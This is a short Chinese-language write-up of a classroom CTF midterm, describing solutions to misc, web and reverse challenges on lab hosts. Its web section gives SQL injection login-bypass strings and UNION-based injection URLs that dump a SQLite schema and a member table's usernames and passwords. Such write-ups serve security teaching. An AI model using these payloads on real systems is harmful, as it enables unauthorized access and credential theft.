# 上機期中考 WriteUp ## Misc ### Real File 1. 把檔名改為PNG 2. 在圖片中找到CTF --- ## Web ### 木票豆頁 1. 在header 裡面找到flag ![](https://i.imgur.com/ZN2iMAT.png) ### SQL In啦 http://10.101.2.61:10006/ 1. 帳號和密碼皆輸入 "' OR ''=''-- " ### WarmUp 1. 找到robots.txt 頁面 2. http://10.101.2.28:8000/robots.txt 3. https://tabby.tw/fllllllaaaggggggggg.html 4. CTF{W0w_u_kn0w_f1ag_her3} ### 快還要更快 1. 把網址後半改成index.php ![](https://i.imgur.com/DkiYNSM.png) ### Hack me if u can http://10.101.2.61:10002/ 1. 帳號密碼輸入 2. anything 'or'1'='1 3. CTF{SQLsAibpssFOnAX~} ### Haiyaaaaaaaaaaaaaaaa http://10.101.2.61:10005/ 1. 打開cmd 2. curl http://10.101.2.61:10005/ 3. 找到flag ### 安全程式設計很重要 使用curl 和 sql union 指令使sql injection 1. curl -X POST http://10.101.2.61:10007/index.php?id=1 2. http://10.101.2.61:10007/index.php?id=1 union select 1,2, sql FROM sqlite_master; -- - 3. http://10.101.2.61:10007/index.php?id=1 union select id,username, password FROM member; -- - ``` mysql news member CREATE TABLE "member" ( "id" INTEGER NOT NULL, "username" TEXT, "password" TEXT, PRIMARY KEY("id") ) Title: 2 CREATE TABLE "news" ( "id" INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, "title" TEXT, "content" TEXT ) Title: 2 CREATE TABLE sqlite_sequence(name,seq) ``` 3. http://10.101.2.61:10007/index.php?id=1 union select id,username, password FROM member; – --- ## Reverse ### 炎の呼吸 把檔名改為txt,在文本當中找到CTF的FLAG